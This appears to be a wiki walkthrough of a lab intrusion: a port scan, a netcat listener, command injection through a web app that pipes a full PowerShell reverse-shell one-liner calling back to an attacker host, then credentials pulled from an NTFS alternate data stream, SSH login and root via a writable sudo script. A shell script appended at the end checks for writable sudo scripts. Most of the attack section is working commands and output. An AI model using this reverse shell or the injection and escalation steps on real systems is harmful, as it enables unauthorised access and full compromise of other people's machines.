cyberdocs:example_gain-access_using_powershell-script
PowerShell reverse shell (the one-liner used below is kept in oneliner.tcp on the attacking machine):
cat oneliner.tcp

Target IP: 172.16.60.54
nmap -sV 172.16.60.54
  port 80 was found open (the target's web application)

On the local (attacking) machine, start a listener:
nc -lnvp 5588
Note: the listener port has to match the port the one-liner connects back to. The listener here is on 5588, while the one-liner below connects to port 443 on 172.16.60.108, so one of the two must be changed before the shell will connect.

Through the web app on the target IP, run this shell command. The leading google.com| is a harmless value for the web app's input followed by a pipe, so the shell the server spawns runs the PowerShell command after it. That command opens a TCP connection back to 172.16.60.108 on port 443, executes whatever it receives with iex, and writes the output plus a PS prompt back over the socket:
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

This gives us a shell on the target.

Change to the user's Desktop and look at root.txt. Get-Item with -Stream * lists every NTFS alternate data stream attached to the file (the visible content is the :$DATA stream), and Get-Content with -Stream reads the hidden stream named target.txt, which holds credentials for another host:
C:\users\arben\Desktop>
Get-Item -Path C:\Users\arben\Desktop\root.txt -Stream *
Get-Content -Path C:\Users\arben\Desktop\root.txt -Stream target.txt
cyber@172.16.60.65
pass: 123Arben123

With the credentials we found, we log in over SSH:

ssh cyber@172.16.60.65
pass: 123Arben123
$
$ sudo -l
found (the command cyber may run as root):
/bin/dash /home/cyber/root_me
$ cat /home/cyber/root_me
the script's contents are shown:
#!/bin/dash
Check with ls -l whether cyber can write to /home/cyber/root_me: sudo runs the interpreter as root, so anything placed in the script runs as root.
sudo /bin/dash /home/cyber/root_me
# :) root
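As an added example (not code from the original page), the check above as a small POSIX shell script: it parses the text of sudo -l for "interpreter script" entries and reports the scripts the current user can write to, which is exactly the condition the final escalation depends on. The sudo -l sample text inside it is constructed to mirror the page's entry; the python3/backup.py line and the host name "target" are made up.

```shell
#!/bin/sh
# Added example, not from the original page: find sudo-allowed "interpreter
# script" entries whose script the current user can modify. Because sudo runs
# the interpreter as root, a writable script means arbitrary commands run as
# root, which is the escalation the page's last step relies on.

# Constructed sample of `sudo -l` output, modelled on the page's entry; the
# python3/backup.py line and the host name "target" are made up.
SAMPLE_SUDO_L='Matching Defaults entries for cyber on target:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User cyber may run the following commands on target:
    (root) NOPASSWD: /bin/dash /home/cyber/root_me
    (root) NOPASSWD: /usr/bin/python3 /opt/tools/backup.py
    (root) /bin/ls'

# Read sudo -l text on stdin and print "interpreter script" pairs, one per
# line. Entry lines start with "(runas)" and may carry tags such as
# "NOPASSWD:"; entries with a single command word (no script argument) are
# dropped. Comma-separated command lists on one line are not handled.
sudo_script_entries() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\([A-Z]*:[[:space:]]*\)*//p' |
    awk 'NF >= 2 { print $1, $2 }'
}

# Take sudo -l text as $1 and print one "WRITABLE: sudo <interp> <script>"
# line for every script the current user can write to ([ -w ] is false for
# a path that does not exist, so missing scripts are not reported).
report_writable_sudo_scripts() {
    printf '%s\n' "$1" | sudo_script_entries | while read -r interp script; do
        if [ -w "$script" ]; then
            printf 'WRITABLE: sudo %s %s\n' "$interp" "$script"
        fi
    done
}

# Stand-alone use against the real sudo -l of the current user:
#   report_writable_sudo_scripts "$(sudo -n -l 2>/dev/null)"
report_writable_sudo_scripts "$SAMPLE_SUDO_L"
```

On the target this would be run as cyber after the SSH login; an entry printed as WRITABLE is one where the sudo rule grants root to whoever can edit the script, not only to the script's author.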
cyberdocs/example_gain-access_using_powershell-script.txt · Last modified: 2019/02/06 14:55 by dardan